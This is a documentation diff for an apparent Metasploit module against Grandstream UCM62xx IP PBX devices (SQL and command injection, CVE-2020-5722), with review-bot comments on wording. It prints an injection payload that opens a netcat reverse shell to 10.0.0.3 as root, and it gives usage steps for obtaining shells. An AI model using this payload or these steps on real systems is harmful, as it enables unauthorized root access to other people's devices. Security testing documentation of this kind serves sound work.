Addressed multiple review comments (spelling, doc details, randomization, etc)
@@ -2,21 +2,35 @@
### Description
This module exploits unauthenticated SQL and command injection vulnerabilities affecting
the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an
unauthenticated and remote attacker to execute commands as root. This module affects
UCM62xx versions before firmware version 1.0.19.20.
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
a command injection vulnerability (technically, no assigned CVE but was inadvertently
patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
series of devices. The vulnerabilities allow an unauthenticated and remote attacker to
execute commands as `root`.
Exploitation happens in two stages:
1. An SQL injection during username lookup while executing the "Forgot Password" function.
2. After successful SQL injection the user provided username is passed to a python script
via the shell. Like so:
```
/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
```
This module affect UCM62xx versions before firmware version 1.0.19.20.
### Installation
The UCM62xx PBX is a physical device and is not known to be succesfully emulated.
The UCM62xx PBX is a physical device and is not known to have been successfully emulated.
However, if you have a device, affected firmware can be downloaded here:
* https://firmware.grandstream.com/Release_UCM62xx_1.0.18.13.zip
## Verification Steps
* Acquire an affected device and configure with affected firmware
* Acquire an affected device and configure it with the affected firmware
* Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce`
* Do: `set RHOST <ip>`
* Do: `check`
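Review bot: the new closing sentence `This module affect UCM62xx versions before firmware version 1.0.19.20.` loses the `s` that the removed sentence (`This module affects UCM62xx versions ...`) had; it should read `affects`. One more point in this hunk: the `/bin/sh -c python ... sendMail.py` example would be self-explaining with a single sentence after `Like so:` saying that everything following `password ''` is the attacker-supplied username as the shell receives it, naming its three parts: the heredoc with the quoted delimiter `TTsf7G0`, the SQL payload `z' or 1=1--` for stage 1, and the backticked `nc 10.0.0.3 4444 -e /bin/sh` that stage 2 executes as `root`. Readers who have not seen the heredoc-in-backticks trick otherwise have to reverse-engineer why the single quote in the SQL payload does not break the command line.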
@@ -30,11 +44,11 @@ However, if you have a device, affected firmware can be downloaded here:
### 0
By default, this targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
This targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
### 1
By default, this target obtains a meterpreter session using `wget`.
This target obtains a meterpreter session using `wget`.
## Options
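Review bot: dropping `By default,` from both the `### 0` and `### 1` descriptions removes the contradiction of two "default" targets, but the doc now never says which target the module selects when `TARGET` is left unset; keep the phrase on the one target that really is the default (and only there), so a reader knows whether a bare `run` yields the `reverse_netcat_gaping` reverse shell or the `wget`-staged meterpreter session.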
@@ -103,7 +117,7 @@ Revision : 63015
Serial : 1126b9d4eacb275c
```
### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat.
### Grandstream UCM6202 IP PBX firmware version 1.0.18.13. Get reverse shell using netcat.
```
msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
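Review bot: the `fimrware` to `firmware` fix is correct; since the heading is being touched anyway, the two full sentences packed into a `###` heading (`... firmware version 1.0.18.13. Get reverse shell using netcat.`) would read better as one phrase, e.g. `### Grandstream UCM6202 IP PBX firmware 1.0.18.13: reverse shell using netcat`, with the `msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce` transcript following it unchanged.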